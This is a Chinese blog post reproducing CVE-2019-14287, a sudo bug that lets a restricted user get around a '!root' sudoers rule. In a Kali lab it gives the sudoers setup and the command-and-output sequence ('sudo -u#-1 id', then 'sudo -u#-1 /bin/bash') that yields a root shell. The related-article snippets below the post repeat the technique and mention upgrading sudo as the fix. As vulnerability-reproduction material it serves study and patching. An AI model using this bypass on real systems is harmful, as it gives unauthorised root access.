CVE-2019-14287:sudo 权限提升漏洞

最新推荐文章于 2022-08-07 16:21:17 发布
最新推荐文章于 2022-08-07 16:21:17 发布
阅读量582 收藏
点赞数 1
分类专栏: 漏洞复现 文章标签: 漏洞复现 CVE-2019-14287 sudo
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43583637/article/details/102873391
版权

0x00 漏洞介绍

sudo本地权限提升漏洞(CVE-2019-14287),是由于sudo配置文件配置不当造成的,此漏洞可以使普通用户绕过限制以root身份执行命令

0x01 影响版本

sudo < 1.8.28

0x02 sudo作用

sudo是允许系统管理员让普通用户执行一些或者全部的root命令的一个工具,这样不仅减少了root用户的登录 和管理时间,同样也提高了安全性

0x03 sudo权限

sudo权限控制在配置文件/etc/sudoers 中,该文件权限如下

root@kali:~# ls -al /etc/sudoers
-r--r----- 1 root root 669 Aug  7 02:58 /etc/sudoers

0x04 漏洞复现

系统平台:kali-2019.03

root@kali:~# lsb_release -a
No LSB modules are available.
Distributor ID:    Kali
Description:    Kali GNU/Linux Rolling
Release:    2019.3
Codename:    kali-rolling

sudo版本

root@kali:~# sudo -V
Sudo version 1.8.27

备份sudo配置文件

root@kali:~# cp /etc/sudoers /etc/sudoers.bak
root@kali:~# ls -al /etc/sudoers*
-r--r----- 1 root root  669 Aug  7 02:58 /etc/sudoers
-r--r----- 1 root root  669 Nov  2 15:37 /etc/sudoers.bak
/etc/sudoers.d:
total 20
drwxr-xr-x   2 root root  4096 Oct 29 17:25 .
drwxr-xr-x 163 root root 12288 Nov  2 15:37 ..
-r--r-----   1 root root   958 Aug  7 02:58 README

新建普通用户

root@kali:~# useradd test
root@kali:~# passwd test
New password:
Retype new password:
passwd: password updated successfully
root@kali:~# useradd world
root@kali:~# passwd world
New password:
Retype new password:
passwd: password updated successfully

修改sudo配置文件

#打开配置文件
visudo

在配置文件添加以下内容,允许test用户可以以所有用户的身份运行id命令

#添加内容
test ALL=(ALL)  /usr/bin/id

命令测试

root@kali:~# su - test
su: warning: cannot change directory to /home/test: No such file or directory
$ id
uid=1000(test) gid=1000(test) groups=1000(test)
$ sudo -u root id


We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:


    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.


[sudo] password for test:
uid=0(root) gid=0(root) groups=0(root)
$ sudo -u world id
uid=1001(world) gid=1001(world) groups=1001(world)
$ sudo -u root whoami
Sorry, user test is not allowed to execute '/usr/bin/whoami' as root on kali.
$ sudo -u world whoami
Sorry, user test is not allowed to execute '/usr/bin/whoami' as world on kali.
$

root@kali:~# su - test
su: warning: cannot change directory to /home/test: No such file or directory
$ sudo -u#0 id
uid=0(root) gid=0(root) groups=0(root)
$ sudo -u#1001 id
uid=1001(world) gid=1001(world) groups=1001(world)
$ sudo -u#0 whoami
Sorry, user test is not allowed to execute '/usr/bin/whoami' as root on kali.
$ sudo -u#1001 whoami
Sorry, user test is not allowed to execute '/usr/bin/whoami' as world on kali.
$

漏洞发现

root@kali:~# su - test
su: warning: cannot change directory to /home/test: No such file or directory
$ sudo -u#-1 id
uid=0(root) gid=1000(test) groups=1000(test)
$

重新配置sudo配置文件,允许test用户可以以除了root用户以外的所有用户身份执行任意的命令

test ALL=(ALL,!root) ALL

命令测试

root@kali:~# su - test
su: warning: cannot change directory to /home/test: No such file or directory
$ sudo -u test id
uid=1000(test) gid=1000(test) groups=1000(test)
$ sudo -u test whoami
test
$ sudo -u root id
Sorry, user test is not allowed to execute '/usr/bin/id' as root on kali.
$ sudo -u root whoami
Sorry, user test is not allowed to execute '/usr/bin/whoami' as root on kali.
$

漏洞触发

root@kali:~# su - test
su: warning: cannot change directory to /home/test: No such file or directory
$ sudo -u#-1 id
uid=0(root) gid=1000(test) groups=1000(test)
$ sudo -u#-1 whoami
root
$ sudo -u#-1 /bin/bash
root@kali:/root# id
uid=0(root) gid=1000(test) groups=1000(test)
root@kali:/root# whoami
root
root@kali:/root#
冠霖L
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2019-14287漏洞与修复过程
weixin_44950652的博客
02-01 1374
CVE-2019-14287漏洞与修复过程CVE-2019-14287漏洞展示修复漏洞 CVE-2019-14287漏洞 CVE-2019-14287本地提权漏洞漏洞因为是Sudo<1.8.28,只需要升级sudo>1.8.28的就可以修复完成 展示 使用root用户修改权限文件:vim /etc/sudoers ,添加如下: chen ALL=(ALL,!root) ALL 2. 添加用户:chen, chen , Useradd chen Passwd chen 使用chen用
CVE-2019-14287(sudo提权)
墨痕诉清风的博客
06-22 644
复现CVE-2019-14287漏洞 原理:Sudo的全称是"superuserdo”,它是Linux系统管理指令,允许用户在不需要切换环境的前提下,以其它用户的权限运行应用程序或命令,通常是以root用户身份运行命令,以减少root用户的登录和管理时间,同时提高安全性,当在Linux操作系统上执行命令时,只有得到许可或者知道root密码,普通用户才可以使用sudo命令以root身份执行命令. 个人理解:(直白点讲就是,如果你入侵了他人的主机,可以利用该漏洞,进行权限升级,不用切换root,因为切换root
CVE-2019-14287 sudo权限绕过漏洞复现
春日野穹
10-24 1925
0x1 引言 近日 ,sudo 被爆光一个漏洞,非授权的特权用户可以绕过限制获得特权,也就是说如果将sudo配置为允许用户通过Runas规范中定义的ALL关键字来以任意用户身份运行命令的话,那么攻击者将有可能通过制定用户ID -1或4294967295来以root权限执行恶意命令,这个漏洞只能在非标准配置的Linux下生效,大多数Linux服务器不受影响。官方的修复公告请见:https://www...
CVE-2019-14287 (Linux sudo命令)漏洞复现
7Riven's blog
12-04 600
漏洞简介 sudo命令:以系统管理者的身份执行指令,配置文件:/etc/sudoers 漏洞形成的原因 配置文件中明确表明不允许以 root 用户进行访问,但通过该漏洞,恶意用户或程序仍可在目标 Linux 系统上,以 root 用户身份执行任意命令。 对应格式及注释如下: 漏洞影响版本:sudo 1.8.28之前的所有版本 漏洞修复:将sudo包更新至最新版本 漏洞复现...
Sudo漏洞分析(CVE-2019-14287)
热门推荐
wo41ge的博客
02-21 1万+
漏洞介绍 最近的国外的团队跟踪并披露了该漏洞,报告中发现,在所有sudo版本低于1.8.29 的Linux机器,均受到该漏洞的影响。 CVE编号:CVE-2019-14287漏洞可以使用户拥有权限运行其他用户命令。 漏洞细节 sudo允许非特权用户以root用户身份执行命令,问题在于在sudo id 在低于1.8.29 版本中以任意用户实现了运行命令的方式,虽然攻击的利用方式,需要对本地配置进行修改,利用此漏洞需要恶意用户具有以任何用户(root用户除外)身份运行命令的特权,如果sudoers文件ALL
CVE-2019-14287 sudo提权(复现
qq_46527139的博客
12-07 227
SUDO提权:CVE-2019-14287复现漏洞概述 sudo错误地处理了某些用户id。攻击者可能利用此漏洞以根用户身份执行任意命令。 漏洞危害等级:高危 影响版本 组件 版本 os linux2019.3 web server sudo1.8.27 基础环境 基础知识: sudo的作用: Linux是多用户多任务的操作系统,共享该系统的用户往往不只一个。 出于安全性考虑,有必要通过useradd创建一些非root用户, 只让它们拥有 不完全的权限;如有必要,再来提升权限
CVE漏洞sudo提权 CVE-2019-14287 简单复现
qq_43370769的博客
11-13 656
CVE漏洞sudo提权 CVE-2019-14287 简单复现 背景 这一个sudo提权漏洞,是安全策略绕过问题,去执行某些敏感的命令。通过这个漏洞,可以使linux上的普通用户执行root权限的命令。 这个漏洞作用于sudo低于1.8.28的版本。、 #我在vm虚拟机ubuntu上进行实现的。 复现过程 1:查看自己的sudo版本 输入命令: sudo -V (注意是大写的V) 2: 创建实验...
CVE-2019-14287 linux sudo root 权限绕过漏洞复现
weixin_42433054的博客
10-16 1235
CVE-2019-14287 linux sudo root 权限绕过漏洞复现 1、准备工具,kali linux,或者任何版本的linux,查看sudo版本 root@kali:~# sudo -V Sudo version 1.8.21p2 明显该版本低于1.8.28。可以进行漏洞利用。 2、创建test用户,并分配密码 root@kali:/etc# useradd test ...
CVE-2019-19268:新发现0天!
04-16
CVE-2019-19268 受影响的版本:rConfig 3.9.2。 [描述] 由于配置错误,rConfig v3.9.2中存在多个攻击媒介,这允许本地用户通过sudo执行root命令。 [发现者] dmw0ng-不和谐:dmw0ng#4449 TheCyber​​Geek-不和谐...
CVE-2021-3156:CVE-2021-3156
03-06
总结一下,CVE-2021-3156,即“Baron Samedit”漏洞,是一个针对Sudo工具的安全威胁,可能导致本地权限提升。这个漏洞的利用涉及环境变量的操纵,使得非特权用户可以执行root级别的操作。解决这个问题需要及时安装...
cve-2021-3156:보안취약점
02-09
这个漏洞允许未经身份验证的远程攻击者通过滥用`sudo`命令来获取系统上的根权限。`sudo`是一个在Unix-like系统中广泛使用的工具,它允许用户以其他用户(通常是root)的权限运行命令,通常用于执行系统管理任务。 ...
CVE-2020-24572-POC:在RaspAP 2.5的includeswebconsole.php中发现了一个问题。 通过经过身份验证的访问,攻击者可以使用配置错误(并且实际上不受限制)的Web控制台攻击运行此软件的底层操作系统,并在系统上执行命令,包括用于上传文件和执行代码的命令
04-01
我添加了有效负载选项,并且没有将漏洞利用限制为希望在执行/etc/raspap/lighttpd/configport.sh时拥有sudo权限,我认为任何人都可以执行sudo -l并在有情况下加以利用。 像往常一样,这仅是出于教育目的。
漏洞复现sudo提权漏洞CVE-2019-14287复现
Abc_Kimball的博客
01-31 810
一、简介 sudo:Linux系统命令,让普通账号以root身份去执行某些命令,如,安装软件、查看某些配置文件、关机、重启等操作,如果普通账号需要使用sudo需要修改配置文件/etc/sudoers,将sudo使用权限赋予该账号 • sudo提权漏洞是一个安全策略绕过问题,去执行某些敏感的命令,CVE编号是CVE-2019-14287,影响的版本是:<1.8.28 二、漏洞复现过程 靶机:Ubuntu 18 x64系统 1.查看sudo版本,并创建test用户 1 sudo -V 查看sudo版本
CVE-2019-14287sudo 权限绕过漏洞复现
shy的博客
10-17 237
Linux sudo命令以系统管理者的身份执行指令,也就是说,经由 sudo 所执行的指令就好像是 root 亲自执行。 使用权限:在 /etc/sudoers 中有出现的使用者。 1.新建用户adduser shy 2.更改密码passwd shy 3.修改/etc/sodoers/文件,由于sudoers文件只有只读权限,不能修改,所以要先赋予它写权限 4.修改/et...
CVE-2019-14287sudo 权限绕过漏洞复现过程)
大方子
10-16 679
实验环境: kali 影响范围: sudo 1.8.28 之前的所有版本 复现过程 查询下sudo的版本 sudo -V 创建用户 useradd test passwd test 编辑下sudoers文件 这里添加了 test ALL=(ALL, !root) /usr/bin/vim 这里表示 test 可以 任意主机上...
sudo相关漏洞CVE-2019-18634、CVE-2019-14287
悦分享
08-07 682
实际上,只要用户的权限足够高,即拥有最高sudo权限的用户,并且在Runas规范中定义了ALL关键字的话,他们就可以运行Runas规范中明确禁止使用的那些root命令,而且以这种方式运行的命令其日志项所显示的目标用户为4294967295,而不是root。但是,sudo日志条目中记录下的命令运行用户的ID为“4294967295”,而并非root用户(或用户ID为“0”),除此之外,因为用户ID是通过-u选项指定的,并且不会在密码数据库中存储,所以PAM会话模块也不会运行。上述命令运行之后,将返回“0”。.
CVE-2019-14287 sudo 配置不当-权限提升漏洞预警
Vic的博客
10-16 251
报告编号:B6-2019-101501 报告来源:360-CERT 报告作者:360-CERT 更新日期:2019-10-15 0x00 漏洞背景 2019年10月14日, sudo 官方在发布了CVE-2019-14287漏洞预警。 sudo 是所有 unix操作系统(BSD, MacOS, GNU/Linux) 基本集成的一个用户权限控制/切换程序。允许管理员控制服务器下用户...
三相三绕组电力变压器专用技术规范.doc
最新发布
06-30
变压器
linux sudo提权漏洞,linux CVE-2019-14287 Sudo提权漏洞(示例代码)
05-19
CVE-2019-14287是一个sudo提权漏洞,攻击者可以利用此漏洞绕过sudo的限制,以root用户的身份执行命令。这个漏洞影响sudo 1.8.28版本之前的所有版本。下面是一个示例代码: ``` $ sudo -u#-1 id uid=0(root) gid=0(root) groups=0(root) ``` 这个命令的意思是以id为用户名,并以-1为用户ID,执行sudo的命令。这样一来,sudo会将命令以root用户的身份执行。攻击者可以利用这个漏洞来获取root权限,并执行其他恶意操作。 解决这个漏洞的方法是升级sudo到最新版本,并禁用旧版本的sudo。同时,管理员应该对系统进行定期的安全审计,并确保所有软件和系统组件都是最新的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值